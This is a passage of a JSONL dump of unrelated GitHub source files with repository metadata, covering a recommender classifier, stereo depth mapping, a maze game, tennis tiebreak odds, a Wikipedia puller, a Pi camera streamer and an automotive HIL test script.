DecisionTreeClassifier(random_state=42)\n\n elif self.__classifier.lower() == \"gaussian_process\":\n if self.__classifier_parameters is not None:\n clf = GaussianProcessClassifier(**self.__classifier_parameters)\n else:\n clf = GaussianProcessClassifier(random_state=42)\n\n logger.info(\"Fitting classifier\")\n if self.__classifier.lower() == \"gaussian_process\":\n pipe = make_pipeline(DictVectorizer(sparse=True), FunctionTransformer(lambda x: x.todense(), accept_sparse=True), clf)\n else:\n pipe = make_pipeline(DictVectorizer(sparse=True), clf)\n\n pipe = pipe.fit(rated_features_bag_list, labels)\n\n columns = [\"to_id\", \"rating\"]\n score_frame = pd.DataFrame(columns=columns)\n\n logger.info(\"Predicting scores\")\n score_labels = pipe.predict_proba(unrated_features_bag_list)\n\n for score, item in zip(score_labels, unrated_items):\n if item is not None:\n score_frame = pd.concat([score_frame, pd.DataFrame.from_records([(item.content_id, score[1])], columns=columns)], ignore_index=True)\n\n score_frame = score_frame.sort_values(['rating'], ascending=False).reset_index(drop=True)\n score_frame = score_frame[:recs_number]\n\n return score_frame\n","repo_name":"m3ttiw/orange_cb_recsys","sub_path":"orange_cb_recsys/recsys/ranking_algorithms/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":9120,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"74786034603","text":"import torch\nimport numpy as np\nfrom embed.datasets import PIPELINES\nfrom embed.datasets.pipelines import DefaultFormatBundle, to_tensor\nfrom embed.cv.parallel import DataContainerWithPad as DC\n\nfrom embed.core import BitmapMasks\n\n@PIPELINES.register_module()\nclass PanopticFCNFormatBundle(DefaultFormatBundle):\n \"\"\"Default formatting bundle.\n\n It simplifies the pipeline of formatting common fields, including \"img\",\n \"proposals\", \"gt_bboxes\", \"gt_labels\", \"gt_masks\" and \"gt_semantic_seg\".\n These fields are formatted as follows.\n\n - img: (1)transpose, (2)to tensor, (3)to DataContainer (stack=True)\n - proposals: (1)to tensor, (2)to DataContainer\n - gt_bboxes: (1)to tensor, (2)to DataContainer\n - gt_bboxes_ignore: (1)to tensor, (2)to DataContainer\n - gt_labels: (1)to tensor, (2)to DataContainer\n - gt_areas: (1)to tensor, (2)to DataContainer\n - gt_centers: (1)to tensor, (2)to DataContainer\n - gt_masks: (0)assert isinstance(gt_masks, BitmapMasks)\n (1)to tensor, (2)to DataContainer\n - gt_semantic_seg: (1)unsqueeze dim-0 (2)to tensor, \\\n (3)to DataContainer (stack=True)\n \"\"\"\n\n def __call__(self, results):\n \"\"\"Call function to transform and format common fields in results.\n\n Args:\n results (dict): Result dict contains the data to convert.\n\n Returns:\n dict: The result dict contains the data that is formatted with \\\n default bundle.\n \"\"\"\n\n if 'img' in results:\n img = results['img']\n # add default meta keys\n results = self._add_default_meta_keys(results)\n if len(img.shape) < 3:\n img = np.expand_dims(img, -1)\n img = np.ascontiguousarray(img.transpose(2, 0, 1))\n results['img'] = DC(to_tensor(img), stack=True)\n for key in ['proposals', 'gt_bboxes', 'gt_bboxes_ignore', 'gt_labels',\n 'gt_areas', 'gt_centers']:\n if key not in results:\n continue\n results[key] = DC(to_tensor(results[key]))\n if 'gt_masks' in results:\n assert isinstance(results['gt_masks'], BitmapMasks)\n# results['gt_masks'] = DC(results['gt_masks'].to_tensor(dtype=torch.uint8, device=torch.device('cpu')), pad=True)\n results['gt_masks'] = DC(results['gt_masks'].to_tensor(dtype=torch.float32, device='cpu'), pad=True)\n if 'gt_semantic_seg' in results:\n results['gt_semantic_seg'] = DC(\n to_tensor(results['gt_semantic_seg'][None, ...]), stack=True)\n return results\n","repo_name":"xmyqsh/embed","sub_path":"embed/datasets/pipelines/formating.py","file_name":"formating.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37615784830","text":"from jugaad_data.rbi import RBI\nimport pytest\n\ndef test_current_rates():\n r = RBI()\n rates = r.current_rates()\n assert '91 day T-bills' in rates\n assert 'Policy Repo Rate' in rates\n assert 'Savings Deposit Rate' in rates\n # Below should not raise exception\n val = float(rates['91 day T-bills'].replace('%',\"\"))\n","repo_name":"jugaad-py/jugaad-data","sub_path":"tests/test_rbi.py","file_name":"test_rbi.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":246,"dataset":"github-code","pt":"19"} +{"seq_id":"40186945929","text":"\"\"\"\nScript for 3D epipolar lines, stereorectification and depth map.\nLinnea Evanson\n13/02/21\n\n\"\"\"\nfrom __future__ import print_function\n\nimport numpy as np\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nfrom resize import resize\n\nclass threeD():\n def __init__(self, img1, img2):\n self.img1 = img1\n self.img2 = img2\n\n def stereo_rectify(self):\n img1= cv.cvtColor(self.img1, cv.COLOR_BGR2GRAY)\n img2 = cv.cvtColor(self.img2, cv.COLOR_BGR2GRAY)\n\n # Initiate SIFT detector\n sift = cv.SIFT_create()\n # find the keypoints and descriptors with SIFT\n kp1, des1 = sift.detectAndCompute(img1, None)\n kp2, des2 = sift.detectAndCompute(img2, None)\n\n\n # Match keypoints in both images\n FLANN_INDEX_KDTREE = 1\n index_params = dict(algorithm=FLANN_INDEX_KDTREE, trees=5)\n search_params = dict(checks=50) # or pass empty dictionary\n flann = cv.FlannBasedMatcher(index_params, search_params)\n matches = flann.knnMatch(des1, des2, k=2)\n\n # Keep good matches: calculate distinctive image features\n # Lowe, D.G. Distinctive Image Features from Scale-Invariant Keypoints. International Journal of Computer Vision 60, 91–110 (2004). https://doi.org/10.1023/B:VISI.0000029664.99615.94\n # https://www.cs.ubc.ca/~lowe/papers/ijcv04.pdf\n matchesMask = [[0, 0] for i in range(len(matches))]\n good = []\n pts1 = []\n pts2 = []\n\n for i, (m, n) in enumerate(matches):\n if m.distance < 0.7 * n.distance:\n # Keep this keypoint pair\n matchesMask[i] = [1, 0]\n good.append(m)\n pts2.append(kp2[m.trainIdx].pt)\n pts1.append(kp1[m.queryIdx].pt)\n\n # STEREO RECTIFICATION\n # Calculate the fundamental matrix for the cameras\n pts1 = np.int32(pts1)\n pts2 = np.int32(pts2)\n fundamental_matrix, inliers = cv.findFundamentalMat(pts1, pts2, cv.FM_RANSAC)\n\n # We select only inlier points\n pts1 = pts1[inliers.ravel() == 1]\n pts2 = pts2[inliers.ravel() == 1]\n\n\n # Stereo rectification (uncalibrated variant)\n # Adapted from: https://stackoverflow.com/a/62607343\n h1, w1 = img1.shape\n h2, w2 = img2.shape\n _, H1, H2 = cv.stereoRectifyUncalibrated(\n np.float32(pts1), np.float32(pts2), fundamental_matrix, imgSize=(w1, h1)\n )\n\n # Undistort (rectify) the images and save them\n # Adapted from: https://stackoverflow.com/a/62607343\n img1_rectified = cv.warpPerspective(img1, H1, (w1, h1))\n img2_rectified = cv.warpPerspective(img2, H2, (w2, h2))\n cv.imwrite(\"rectified_1.png\", img1_rectified)\n cv.imwrite(\"rectified_2.png\", img2_rectified)\n\n # Draw the rectified images\n fig, axes = plt.subplots(1, 2, figsize=(15, 10))\n axes[0].imshow(img1_rectified, cmap=\"gray\")\n axes[1].imshow(img2_rectified, cmap=\"gray\")\n axes[0].axhline(1500)\n axes[1].axhline(1500)\n axes[0].axhline(2000)\n axes[1].axhline(2000)\n axes[0].axhline(1750)\n axes[1].axhline(1750)\n axes[0].axhline(1750)\n axes[1].axhline(1750)\n axes[0].axhline(2200)\n axes[1].axhline(2200)\n\n plt.suptitle(\"Rectified images\")\n plt.savefig(\"rectified_images.png\")\n plt.show()\n\n return img1_rectified, img2_rectified\n\n def depth_map_rectified(self, imgL, imgR):\n\n #Matched block size. It must be an odd number >=1 . Normally, it should be somewhere in the 3..11 range.\n block_size = 11\n min_disp = -128\n max_disp = 128\n # Maximum disparity minus minimum disparity. The value is always greater than zero.\n # In the current implementation, this parameter must be divisible by 16.\n num_disp = max_disp - min_disp\n # Margin in percentage by which the best (minimum) computed cost function value should \"win\" the second best value to consider the found match correct.\n # Normally, a value within the 5-15 range is good enough\n uniquenessRatio = 5\n # Maximum size of smooth disparity regions to consider their noise speckles and invalidate.\n # Set it to 0 to disable speckle filtering. Otherwise, set it somewhere in the 50-200 range.\n speckleWindowSize = 200\n # Maximum disparity variation within each connected component.\n # If you do speckle filtering, set the parameter to a positive value, it will be implicitly multiplied by 16.\n # Normally, 1 or 2 is good enough.\n speckleRange = 2\n disp12MaxDiff = 0\n\n stereo = cv.StereoSGBM_create(\n minDisparity=min_disp,\n numDisparities=num_disp,\n blockSize=block_size,\n uniquenessRatio=uniquenessRatio,\n speckleWindowSize=speckleWindowSize,\n speckleRange=speckleRange,\n disp12MaxDiff=disp12MaxDiff,\n P1=8 * 1 * block_size * block_size,\n P2=32 * 1 * block_size * block_size,\n )\n disparity_SGBM = stereo.compute(imgL, imgR)\n\n # Normalize the values to a range from 0..255 for a grayscale image\n disparity_SGBM = cv.normalize(disparity_SGBM, disparity_SGBM, alpha=255,\n beta=0, norm_type=cv.NORM_MINMAX)\n disparity_SGBM = np.uint8(disparity_SGBM)\n cv.imshow(\"Disparity of Rectified Imgs\", resize(disparity_SGBM,30))\n cv.imwrite(\"disparity_SGBM_norm_GRID.png\", disparity_SGBM)\n\n def depth_map(self):\n imgL = cv.cvtColor(self.img1, cv.COLOR_BGR2GRAY)\n imgR = cv.cvtColor(self.img2, cv.COLOR_BGR2GRAY)\n\n stereo = cv.StereoBM_create(numDisparities=16,\n blockSize=15) # numDisparities is window size, must be divisible by 16\n\n disparity = stereo.compute(imgL, imgR)\n\n local_max = disparity.max()\n local_min = disparity.min()\n print(\"MAX \" + str(local_max))\n print(\"MIN \" + str(local_min))\n disparity_visual = (disparity - local_min) * (1.0 / (local_max - local_min))\n\n\n\n plt.imshow(disparity_visual, 'gray')\n plt.title(\"Depth map\")\n plt.show()","repo_name":"linnea-evanson/ComputerVisionCW","sub_path":"CVPR_CW1/threeD_two.py","file_name":"threeD_two.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70459515882","text":"###############################################################################\n# This file contains all the helper functions for gameMode_timerFired\n# Citation 1. Sprite sheets Code: \n # TA led mini lecture on images/Pil: \n # https://scs.hosted.panopto.com/Panopto/Pages/Viewer.aspx?id=249eb6cc-06ee-450b-8d1e-adda0085dd69 \n # 15112 course notes (Animations Part 4)\n # https://www.cs.cmu.edu/~112/notes/notes-animations-part4.html#spritesheetsWithCropping\n # Extend of what I copied: primarily just initImages.\n# Including:\n # checkIfTAChosen \n # sprites (See citation 1 for sprite code)\n # moveBacktrackerGhost\n # moveBacktrackerGhost2\n # alterRowCol\n # checkIfTAOverNode\n # updateHealth\n # checkIfTAOverPowerUp\n###############################################################################\n\nfrom makeMazeStudent import *\nimport copy, time\n\ndef checkIfTAChosen(app):\n if app.ta == 'winston':\n app.taImage = 'images/spriteSheet-trans1.png'\n app.taImage = app.loadImage(app.taImage)\n app.taImage = app.scaleImage(app.taImage, 0.25) \n app.TA.initImages(app.taImage)\n elif app.ta == 'stephanie':\n app.taImage = 'images/spriteSheet-trans2.png'\n app.taImage = app.loadImage(app.taImage)\n app.taImage = app.scaleImage(app.taImage, 0.25) \n app.TA.initImages(app.taImage)\n\n# (See citation 1 for sprite code)\ndef sprites(app):\n # ohq Student sprite counter\n app.ohqStudentSpriteCounter = ( (1 + app.ohqStudentSpriteCounter) \n % len(app.ohqStudentSprites) )\n # ta sprite counter\n if app.isMoving:\n app.TA.spriteCounter = (app.TA.spriteCounter + 1) % 4\n else:\n app.TA.spriteCounter = 0\n\ndef moveBacktrackerGhost(app):\n # nodesToGo: the next node to go to is at the end of the list. \n # so if we reach a power up, we want to take a step back. we would need to \n # append that node to app.nodesToGo\n # we should keep track of nodes we went to. (app.pastNodes)\n if app.reachedPowerUp == True:\n app.nodesToGo.append(app.lastNode)\n app.nodesToGo.append(app.lastNode)\n app.reachedPowerUp = False\n if app.nodesToGo != []:\n cop = copy.deepcopy(app.nodesToGo) \n if time.time() - app.t1 > 0.5:\n if cop != []:\n start = (app.backtrackerGhostX, app.backtrackerGhostY)\n end = cop[-1]\n #app.pastNodes.append(end)\n app.lastNode = end\n # if going down or up (x is same)\n if start[0] == end[0]:\n h = abs(start[1]-end[1])\n # if going down. \n if end[1] >= start[1]:\n app.backtrackerGhostY += h \n # if going up. \n else: \n app.backtrackerGhostY -= h \n # if going left or right (y is same)\n else: # elif start[1] == end[1]:\n h = abs(start[0]-end[0])\n # if going left. \n if end[0] <= start[0]:\n app.backtrackerGhostX -= h \n # if going right. \n else: \n app.backtrackerGhostX += h \n app.t1 = time.time()\n cop.pop()\n app.nodesToGo = cop\n\ndef moveBacktrackerGhost2(app):\n if app.reachedPowerUp == True:\n app.nodesToGo2.append(app.lastNode)\n app.nodesToGo.append(app.lastNode)\n app.reachedPowerUp = False\n if app.nodesToGo2 != []:\n cop = copy.deepcopy(app.nodesToGo2) \n if time.time() - app.t2 > 0.5:\n if cop != []:\n start = (app.backtrackerGhostX2, app.backtrackerGhostY2)\n end = cop[-1]\n\n # if going down or up (x is same)\n if start[0] == end[0]:\n h = abs(start[1]-end[1])\n # if going down. \n if end[1] >= start[1]:\n app.backtrackerGhostY2 += h \n # if going up. \n else: \n app.backtrackerGhostY2 -= h \n # if going left or right (y is same)\n else: # elif start[1] == end[1]:\n h = abs(start[0]-end[0])\n # if going left. \n if end[0] <= start[0]:\n app.backtrackerGhostX2 -= h \n # if going right. \n else: \n app.backtrackerGhostX2 += h \n app.t2 = time.time()\n cop.pop()\n app.nodesToGo2 = cop\n updateHealth(app)\n checkIfTAOverPowerUp(app)\n\ndef alterRowCol(app, row, col): # returns (x, y)\n mazeWidth = app.width - 2*app.margin\n mazeHeight = app.height - 2*app.margin\n cellWidth = mazeWidth / app.rows\n cellHeight = mazeHeight / app.cols\n x = app.margin + row*cellWidth\n y = app.margin + col*cellHeight\n return (x, y)\n \ndef checkIfTAOverNode(app):\n lstOfAllPossibleNodes = []\n mazeWidth = app.width - 2*app.margin\n mazeHeight = app.height - 2*app.margin\n cellWidth = mazeWidth / app.rows\n cellHeight = mazeHeight / app.cols\n for i in range(app.cols):\n for j in range(app.rows):\n nodeX = app.margin + i*cellWidth\n nodeY = app.margin + j*cellHeight\n node = (nodeX, nodeY)\n lstOfAllPossibleNodes.append(node)\n possX = app.margin\n possY = app.margin\n for (nodeX, nodeY) in app.nodesToGo:\n if (possX - 5 <= nodeX <= possX + 5 and \n possY - 5 <= nodeY <= possY + 5):\n app.nodesToGo.remove((nodeX, nodeY))\n break\n for (nodeX, nodeY) in app.nodesToGo2:\n if (possX - 5 <= nodeX <= possX + 5 and \n possY - 5 <= nodeY <= possY + 5):\n app.nodesToGo2.remove((nodeX, nodeY))\n break\n x = 0\n y = 0\n for (nodeX, nodeY) in lstOfAllPossibleNodes:\n if (nodeX - 10 <= app.TA.playerX <= nodeX + 10 and\n nodeY - 10 <= app.TA.playerY <= nodeY + 10):\n # this means the TA is at a node. \n x = nodeX\n y = nodeY\n node = (x, y)\n if node in app.nodesToGo:\n app.nodesToGo.remove(node)\n app.nodesToGo.insert(0, node)\n if node in app.nodesToGo2:\n app.nodesToGo2.remove(node)\n app.nodesToGo2.insert(0, node)\n break\n if x == 0 and y == 0:\n pass\n\ndef updateHealth(app):\n app.drawHealthMessage = False\n # check if TA's location is same as ghost location. (or within 20)\n if (app.backtrackerGhostX - 20 <= app.TA.playerX \n <= app.backtrackerGhostX + 20 and \n app.backtrackerGhostY - 20 <= app.TA.playerY \n <= app.backtrackerGhostY + 20):\n app.health -= 10\n app.drawHealthMessage = True\n\ndef checkIfTAOverPowerUp(app):\n app.drawPowerUpMessage = False\n if (app.TA.playerX - 10 <= app.powerUpX <= app.TA.playerX + 10 and\n app.TA.playerY - 10 <= app.powerUpY <= app.TA.playerY + 10):\n app.drawPowerUp = False # when we reach powerUp. \n app.reachedPowerUp = True\n app.drawPowerUpMessage = True\n # if this is true, the student will automatically go back to where it \n # originally spawned. ","repo_name":"anahitahassan/112-Term-Project","sub_path":"Codebase/timerFiredHelper.py","file_name":"timerFiredHelper.py","file_ext":"py","file_size_in_byte":7397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15299948422","text":"## calculate the probability that the current server wins a best-of-p tiebreak.\n \n## some results shown here:\n## http://summerofjeff.wordpress.com/2010/12/04/7-point-tiebreak-win-expectancy-tables/\n \ndef fact(x):\n if x in [0, 1]: return 1\n r = 1\n for a in range(1, (x+1)): r = r*a\n return r\n \ndef ch(a, b):\n return fact(a)/(fact(b)*fact(a-b))\n \ndef tiebreakProb(s, t, v=0, w=0, p=7):\n ## calculate the probability that the current server wins a best-of-p tiebreak.\n ## s = p(server wins service point)\n ## t = p(current server wins return point)\n ## v, w = current score\n ## check if tiebreak is already over:\n if v >= p and (v-w) >= 2:\n return 1\n elif w >= p and (w-v) >= 2:\n return 0\n else: pass\n ## re-adjust so that point score is not higher than p;\n ## e.g., if p=7 and score is 8-8, adjust to 6-6, which\n ## is logically equivalent\n while True:\n if (v+w) > 2*(p-1):\n v -= 1\n w -= 1\n else: break\n outcomes = {} ## track probability of each possible score\n ## this is messy and probably not optimal, figuring out\n ## how many points remain, and how many are on each\n ## player's serve:\n for i in range((p-1)):\n remain = p + i - v - w\n if remain < 1: continue\n else: pass\n if remain % 2 == 1: \n if (v+w) % 2 == 0: ## sr[rs[sr\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain-1)/2\n ret = (remain+1)/2\n else: ## ss[rr[ss[\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain+1)/2\n ret = (remain-1)/2 \n else:\n if (v+w) % 2 == 0: ## sr[rs[sr\n svc, ret = remain/2, remain/2\n else: ## ss[rr[ss[\n svc, ret = (remain-2)/2, (remain-2)/2\n if remain % 4 == 0:\n svc += 1\n ret += 1\n else:\n svc += 2\n ## who serves the last point?\n if (v+w) % 2 == 0:\n## if remain in [1, 4, 5, 8, 9, 12, 13, 16, 17, 20, 21]: ## pattern: remain % 4 in [0, 1]\n if (remain % 4) in [0, 1]:\n final = s\n svc -= 1\n else:\n final = t\n ret -= 1\n else:\n## if remain in [3, 4, 7, 8, 11, 12, 15, 16, 19, 20]:\n if (remain%4) in [3, 0]:\n final = t\n ret -= 1\n else:\n final = s\n svc -= 1\n pOutcome = 0\n for j in range(svc+1):\n for k in range(ret+1):\n if (j+k) == (p - 1 - v):\n m = svc - j\n n = ret - k\n pr = (s**j)*(t**k)*((1-s)**m)*((1-t)**n)*ch(svc,j)*ch(ret,k)*final\n pOutcome += pr\n else: continue\n key = str(p) + str(i)\n outcomes[key] = pOutcome\n if remain % 2 == 1: \n if (v+w) % 2 == 0: ## sr[rs[sr\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain-1)/2\n ret = (remain+1)/2\n else: ## ss[rr[ss[\n if (remain-1) % 4 == 0: ## ...s\n svc = (remain+1)/2 \n ret = (remain-1)/2\n else:\n svc = (remain+1)/2\n ret = (remain-1)/2 \n else:\n if (v+w) % 2 == 0: ## sr[rs[sr\n svc, ret = remain/2, remain/2\n else: ## ss[rr[ss[\n svc, ret = (remain-2)/2, (remain-2)/2\n if remain % 4 == 0:\n svc += 1\n ret += 1\n else:\n svc += 2\n ## probability of getting to (p-1)-(p-1) (e.g. 6-6)\n final = 1\n x = 0\n for j in range(svc+1):\n for k in range(ret+1):\n if (j+k) == (p - 1 - v):\n m = svc - j\n n = ret - k\n pr = (s**j)*(t**k)*((1-s)**m)*((1-t)**n)*ch(svc,j)*ch(ret,k)*final\n x += pr\n else: continue\n outcomes['+'] = (x*s*t)/((s*t) + (1-s)*(1-t))\n ## add up all positive outcomes\n wtb = 0\n for z in outcomes:\n wtb += outcomes[z]\n return wtb\n","repo_name":"JeffSackmann/tennis_misc","sub_path":"tennisTiebreakProbability.py","file_name":"tennisTiebreakProbability.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"19"} +{"seq_id":"3479789834","text":"from tkinter import *\nimport speedtest\n\ndef speedCheck():\n sp = speedtest.Speedtest()\n sp.get_servers()\n down = str(round(sp.download()/(10**6),3)) + \"Mbps\"\n up = str(round(sp.upload()/(10**6),3)) + \"Mbps\"\n lab_down.config(text=down)\n lab_up.config(text=up)\n\nsp = Tk()\nsp.title(\"SpeedTest\")\nsp.geometry(\"500x500\")\nsp.config(bg= \"light grey\")\nlab = Label(sp, text=\"Internet Speed Test\")\nlab.place(x=40, y=40, width=200)\n\nlab = Label(sp, text=\"Downloading Speed\", fg=\"blue\")\nlab.place(x=40, y=90, width=200)\n\nlab_down = Label(sp, text=\"00\")\nlab_down.place(x=40, y=140, width=200)\n\nlab = Label(sp, text=\"Uploading Speed\")\nlab.place(x=40, y=190, width=200)\n\nlab_up = Label(sp, text=\"00\")\nlab_up.place(x=40, y=240, width=200)\n\nbutton = Button(sp,text=\"CHECK SPEED\", relief=RAISED, command=speedCheck)\nbutton.place(x=40, y=290, width=200)\n\n\nsp.mainloop() ","repo_name":"surbhiahuja/Python","sub_path":"SpeedTest.py","file_name":"SpeedTest.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18855001215","text":"#!/usr/bin/env python\n\nimport sys\nimport re\nimport time\nimport json\nimport sqlite3\nimport datetime\nimport wikipediaapi\n\n\n### Parameters\nTHROTTLE_TIME = 0.5\nDEFAULT_ARTICLE_LIST = 'level_4_titles.txt' # default to short list of titles\nDB_FILE = 'briki.db'\nARTICLE_TABLE = 'articles'\n\n\n# Functions\n\n# Use a regular expression to add a space after every period that's\n# followed by a non-space character or a non-digit character\ndef clean_summary(text):\n return re.sub(r'\\.(?=[^\\s\\d])', '. ', text)\n\n# Remove extra white space in string.\ndef remove_extra_spaces(string):\n return re.sub(r\"\\s+\", \" \", string)\n\n# Take a string with newline characters and return a list of paragraphs.\ndef split_into_paragraphs(string):\n return string.split(\"\\n\")\n\ndef pull_article(title):\n # Check to see if the title is already in the articles table\n # TODO: Also check date_update to see if it is out of date\n cursor.execute('SELECT * FROM articles WHERE title=?', (title,))\n row = cursor.fetchone()\n\n if row is None: # We don't have this one yet.\n print(\"Pulling %s into to database...\" % title)\n try:\n # grab page from Wikipedia\n time.sleep(THROTTLE_TIME)\n page = wiki.page(title)\n contents = clean_summary(page.summary)\n\n # Get the current data and time\n date_update = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # Get links to other pages in the 'See also' section, if it exists\n sections = page.sections\n see_also_text = ''\n for s in sections:\n if s.title == 'See also':\n see_also_text = s.text\n break\n see_also = split_into_paragraphs(see_also_text)\n see_also_json = json.dumps(see_also)\n\n # Insert the title, date_update, contents, see_also, and see_from into the articles table\n cursor.execute('''\n INSERT INTO articles(title, date_update, contents, see_also)\n VALUES(?, ?, ?, ?)''', (title, date_update, contents, see_also_json))\n conn.commit()\n except Exception as e:\n print(\"*** Error pulling %s: %s\" % (title, e))\n else:\n print(\"Skipping %s since it's already in the database.\" % title)\n\n\n### Main\n\n# Command line handling \nif len(sys.argv) < 2:\n filename = DEFAULT_ARTICLE_LIST\nelse:\n filename = sys.argv[1]\n\n# Connect to SQLite database\nconn = sqlite3.connect(DB_FILE)\ncursor = conn.cursor()\n\n# Check to see if articles table exists and if it doesn't create it...\n# TODO: Rename see_also to refs_in\ncursor.execute('''\n CREATE TABLE IF NOT EXISTS articles(\n id INTEGER PRIMARY KEY,\n title TEXT NOT NULL,\n date_update TEXT,\n contents TEXT,\n see_also TEXT)\n''')\n \n# Read each line of dict_test into an array\nwith open(filename) as f:\n dict = f.readlines()\n\n# Run through all titles and pull the contents from Wikipedia\nwiki = wikipediaapi.Wikipedia('en')\nfor the_title in dict:\n # Remove the newline character from the end of the title\n the_title = the_title.rstrip('\\n')\n\n # Add the title to the articles table\n pull_article(the_title)\n \n# Close the database\nconn.close()\n","repo_name":"jonbirge/briki","sub_path":"pull_wiki_articles.py","file_name":"pull_wiki_articles.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"32616123848","text":"from picamera import PiCamera\nfrom time import sleep\nimport io\nimport socket\nimport struct\nimport time\nimport picamera\nfrom PIL import Image\n# from adafruit_st7735r import ST7735R\n# import adafruit_imageload\n\nPORT = 5029 # Port to listen on (non-privileged ports are > 1023)\nHOST = ''\n\ncamera = PiCamera()\n\n# Reference for sending stream: https://picamera.readthedocs.io/en/release-1.10/recipes1.html\ndef captureStreamPIL():\n stream = io.BytesIO()\n camera.capture(stream, format='bmp') # capture the image and store in stream as bmp\n stream.seek(0) # start at beginning of stream\n image = Image.open(stream) # read the contents of the stream and store in PIL Image\n\n # Convert to byte array\n imgByteArr = io.BytesIO()\n image.save(imgByteArr, format='bmp')\n imgByteArrToReturn = imgByteArr.getvalue()\n\n # Return to byte array to send\n return imgByteArrToReturn\n\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen()\n (conn, addr) = s.accept()\n print(\"Connected\")\n camera.start_preview()\n # Camera warm-up time\n time.sleep(2)\n while True:\n img = captureStreamPIL()\n conn.send(img)\n\n camera.stop_preview()\n s.close()\n\n\n\n","repo_name":"andreakshao/Line-Following-Robot-CPEN291","sub_path":"Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34766197977","text":"from _automation_wrapper_ import TestEnv\nfrom ttk_checks import basic_tests\nimport functions_gearselection\nfrom functions_nm import _checkStatus\nimport functions_common\nimport functions_nm\nimport time\nfrom time import time as t\n\n# Instantiate test environment\ntestenv = TestEnv()\n\ntry:\n # #########################################################################\n # Testenv #################################################################\n testenv.setup()\n testresult = testenv.getResults()\n\n # Initialize functions ####################################################\n hil = testenv.getHil()\n daq = testenv.getGammaDAQ()\n func_gs = functions_gearselection.FunctionsGearSelection(testenv, hil)\n func_com = functions_common.FunctionsCommon(testenv)\n func_nm = functions_nm.FunctionsNM(testenv)\n\n # Initialize variables ####################################################\n test_variable = hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value\n test_variable.alias = \"Waehlhebel_04:WH_Zustand_N_Haltephase_2\"\n\n # set Testcase ID #########################################################\n testresult.setTestcaseId(\"TestSpec_116\")\n\n # TEST PRE CONDITIONS #####################################################\n testresult.append([\"[#0] Test Vorbedingungen\", \"\"])\n testresult.append([\"[+] Starte ECU (KL30 an, KL15 an)\", \"\"])\n testenv.startupECU()\n testresult.append([\"[.]Initialisierungsphase abgeschlossen und Waehlhebelposition D aktiviert\", \"\"])\n descr, verdict = func_gs.changeDrivePosition('D')\n testresult.append([\"\\xa0\" + descr, verdict])\n\n # TEST PROCESS ############################################################\n testresult.append([\" Starte Testprozess: %s\" % testenv.script_name.split('.py')[0], \"\"])\n\n # test step 1\n testresult.append([\"\\x0a1. Lese Signal Waehlhebel_04:WH_Zustand_N_Haltephase_2\", \"\"])\n testresult.append([\" Prüfe WH_Zustand_N_Haltephase_2 = 0\", \"\"])\n testresult.append(\n basic_tests.checkStatus(\n current_status=hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value,\n nominal_status=0,\n descr=\"Prüfe, dass Wert 0 ist\",\n )\n )\n\n # test step 2\n testresult.append([\"\\x0a2 Setze SiShift_FlgStrtNeutHldPha = 1,VDSO_Vx3d = 32766 (0 km/h),SIShift_StLghtDrvPosn = 6, und Kl15 aus \", \"\"])\n hil.SiShift_01__SIShift_FlgStrtNeutHldPha__value.set(1)\n\n descr, verdict = func_gs.setVelocity_kmph(0)\n testresult.append([\"\\xa0\" + descr, verdict])\n\n descr, verdict = func_gs.changeDrivePosition('N')\n testresult.append([\"\\xa0\" + descr, verdict])\n\n testresult.append([\"Setze KL15 auf 0 (inactive) und 150ms warten\", \"INFO\"])\n hil.cl15_on__.set(0)\n time.sleep(0.15)\n\n testresult.append([\"\\x0a2.1 Schalte Senden von RX Signalen (HiL --> ECU) aus\", \"\"])\n func_nm.hil_ecu_tx_off_state(\"aus\")\n\n testresult.append([\"\\x0aPrüfe WH_Zustand_N_Haltephase_2 = 1 \", \"INFO\"])\n testresult.append(\n basic_tests.checkStatus(\n current_status=hil.Waehlhebel_04__WH_Zustand_N_Haltephase_2__value,\n nominal_status=1,\n descr=\"Prüfe, dass Wert 1 ist\",\n )\n )\n\n # test step 3\n testresult.append([\"\\x0a3.1 min warten...nach 1 min CAN-Trace auswerten\", \"\"])\n time.sleep(60)\n testresult.append([\"\\x0aPrüfe, Kein Senden und Empfangen von Botschaften (WH im lokalen Nachlauf\", \"\"])\n time_1 = time.time()\n descr, verdict = func_gs.checkBusruhe(daq, 1)\n testresult.append([descr, verdict])\n\n time_2 = time.time()\n time_difference = time_2 - time_1\n\n testresult.append([\"Prüfe Strommonitoring (2 mA t():\n curr_timestamp = nm_timestamp.get()\n if start_timestamp != curr_timestamp:\n testresult.append(\n [\"\\xa0 WH starts sending the message after %sec\" % (curr_timestamp - start_timestamp), \"PASSED\"])\n WH_Sends_data = True\n break\n elif t_out > t() == False:\n testresult.append(\n [\"\\xa0 WH not sending the message \", \"FAILED\"])\n break\n\n if WH_Sends_data == False:\n 